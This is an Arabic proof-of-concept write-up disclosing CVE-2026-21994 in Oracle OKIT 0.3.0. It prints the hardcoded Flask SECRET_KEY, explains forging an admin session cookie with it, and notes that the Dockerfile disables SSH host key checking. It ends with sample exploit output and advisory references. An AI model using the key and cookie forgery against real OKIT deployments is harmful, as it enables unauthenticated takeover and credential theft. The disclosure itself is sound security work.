
إثبات مفهوم لاستغلال CVE-2026-21994، يوضح تزوير جلسة مسؤول دون مصادقة عبر مفتاح SECRET_KEY ثابت في Flask وتجاوز التحقق من مضيف SSH في Oracle OKIT.
يحتوي إصدار Oracle OKIT (oci-designer-toolkit) 0.3.0 على خطأين حرجين في التكوين يترابطان معًا لتمكين استيلاء كامل غير مصادق عليه. إن SECRET_KEY الخاص بـ Flask والمُرمّز بشكل ثابت والمكشوف في المستودع العام يسمح لأي مهاجم بتزوير ملف تعريف ارتباط جلسة إدارية صالح — دون الحاجة إلى أي بيانات اعتماد. بشكل منفصل، تقوم صورة Docker بتعطيل التحقق من مضيف SSH بالكامل، مما يمكن مهاجمًا على الشبكة من اعتراض مفاتيح OCI API والمفاتيح الخاصة أثناء عمليات نشر البنية التحتية.
1. SECRET_KEY مُرمّز بشكل ثابت — okitclassic/okitserver/config.py:4
SECRET_KEY='8980ffsd675747jjjh'
يستخدم Flask هذا المفتاح لتوقيع ملفات تعريف ارتباط الجلسة. نظرًا لأنه مُرمّز بشكل ثابت في مستودع عام، يمكن للمهاجم تزوير ملف تعريف ارتباط إداري صالح والوصول إلى لوحة تحكم OKIT بدون أي بيانات اعتماد.
2. تعطيل التحقق من مضيف SSH — Dockerfile:41
&& echo ' StrictHostKeyChecking no' >> /etc/ssh/ssh_config \
&& echo ' UserKnownHostsFile=/dev/null' >> /etc/ssh/ssh_config \
لا تتحقق الحاوية أبدًا من بصمات مضيف SSH. يمكن لمهاجم على الشبكة تنفيذ هجوم رجل في المنتصف (MitM) على عمليات النشر وسرقة بيانات اعتماد OCI.
شغّل exploit.py داخل دليل المستودع المستنسخ:
python3 exploit.py
[*] Scanning okitclassic/okitserver/config.py ...
[!] VULNERABLE — Hardcoded SECRET_KEY found: 8980ffsd675747jjjh
[+] Authentication bypass possible with zero credentials.
[*] Scanning Dockerfile ...
[!] VULNERABLE — SSH host verification is DISABLED.
[+] Network attacker can MitM deployments and steal OCI credentials.
[*] Forging admin session cookie ...
[!] SUCCESS — Forged cookie: .eJwlzj0OgkAQBeC7bG1...
| معرف CVE | CVE-2026-21994 |
| نشرة GitHub الأمنية | GHSA-g6qw-3gmw-m78m |
| CWE | CWE-284 — التحكم غير السليم في الوصول |
| تخطيط نشرة Oracle الأمنية | oracle.com/security-alerts/public-vuln-to-advisory-mapping |
| مرجع CVE الخاص بـ Oracle | oracle.com/security-alerts/all-oracle-cves |
| الإصلاح | oracle/oci-designer-toolkit#780 |
تم اكتشافها والإبلاغ عنها بواسطة Gouri Sankar A — g0w6y